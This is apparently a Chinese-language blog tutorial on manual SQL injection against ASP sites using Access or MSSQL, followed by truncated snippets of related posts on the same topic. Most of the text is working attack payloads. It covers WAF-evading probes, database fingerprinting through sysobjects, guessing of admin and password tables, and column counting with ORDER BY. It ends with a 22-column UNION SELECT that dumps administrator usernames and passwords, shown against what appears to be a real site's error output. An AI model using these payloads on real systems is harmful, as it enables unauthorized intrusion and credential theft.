尋找注入點
首先呢,在**中尋找傳遞引數的頁面,也就是尋找注入點。
判斷注入
找到頁面(注入點)之後呢,我們需要判斷當前頁面是否存在注入
傳統的方法是:
語句狀態
鏈結後面加 』
報錯and 1=1
正常and 1=2
報錯or 1=2
正常or 1=1
報錯或者跳轉到另外乙個頁面
我們不使用傳統的方法,因為傳統的方法在web伺服器有waf的情況下輸入的語句會被攔截。我們一般在值前面加上 「 - 」(減號),頁面變空白了(報錯),說明網頁把我們輸入的值傳遞到資料庫查詢了,資料庫沒有這個結果,所以返回空白。
接著在鏈結後面空格輸入 「 -0 」
這時候,我們可以看到,頁面又返回正常了。
在asp網頁中,用到的資料庫基本上都是access或者mssql。不同的資料庫所用到的語句是不一樣的。接下來,我們要用到sql語句來判斷資料庫是access還是mssql(microsoft sql)。
語句資料庫
and exsits(select * from sysobjects)
sql server
and exsits(select * from msysobjects)
access
先判斷它是否為sql server 資料庫,輸入
and exsits(
select
*from sysobjects)
microsoft ole db provider for odbc drivers 錯誤 『80040e37』「資料庫引擎找不到輸入表或查詢」 說明該**用的不是sql server資料庫,這時,我們可以發現紅色劃線中" microsoft access " 其實,我們不需要再輸入下一條語句就可以直接判斷**用的是什麼資料庫了。(也就是只需要**報錯顯示資料庫資訊即可)[microsoft][odbc microsoft access driver] microsoft jet 資料庫引擎找不到輸入表或查詢 『sysobjects』。 確定它是否存在,以及它的名稱的拼寫是否正確。 /production/product_detail.asp,行 5
猜欄位
我們已知資料庫型別,接下來就是猜表名和列名了
語句and exists (select 列名 from 表名)
先猜表名,頁面正常即存在表
猜完表名後再猜列名
and
exists
(select password from admin)
我們猜下存放賬號的列
都存在,最後我們開始猜欄位(列)長度語句釋
order by 數字
字段小於或等於時,頁面正常,大於時,頁面錯誤
我們輸入的是 order by 11 說明字段小於或等於
輸入 order by 22,還是正常
輸入 order by23 ,頁面錯誤,說明字段長度就是 22
爆欄位
表名、列名字和段長度都猜出來了,最後,我們嘗試爆出欄位的內容
union
select1,
2,3,
4,5,
6,7,
8,9,
10,11,
12,13,
14,15,
16,17,
18,19,
20,21,
22from admin
//admin為表名
在3,15替換我們猜好的兩個列名,這時候呢,賬號和密碼就爆出來了。
union
select1,
2,admin,4,
5,6,
7,8,
9,10,
11,12,
13,14,password,16,
17,18,
19,20,
21,22from admin
SQL注入之ACCESS注入筆記
以.mdb字尾命名 乙個檔案就是乙個庫,和mysql不同 開啟方式用office或者第三方工具 表名 欄位名 資料內容step1 判斷注入是否存在 step2 猜解表名 step3 猜解字段數 step4 猜解欄位名 step5 猜解內容長度 step6 猜解內容 單引號報錯,因為在sql語句中單引...
sql注入 手工注入
表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...
SQL注入之偏移注入(Access)
什麼是偏移注入?偏移注入是一種注入姿勢,可以根據乙個較多字段的表對乙個少字段的表進行偏移注入,一般是聯合查詢,在頁面有回顯點的情況下 偏移注入使用場景 在 sql注入的時候會遇到一些無法查詢列名的問題,比如系統自帶資料庫的許可權不夠而無法訪問系統自帶庫。當你猜到表名無法猜到欄位名的情況下,我們可以使...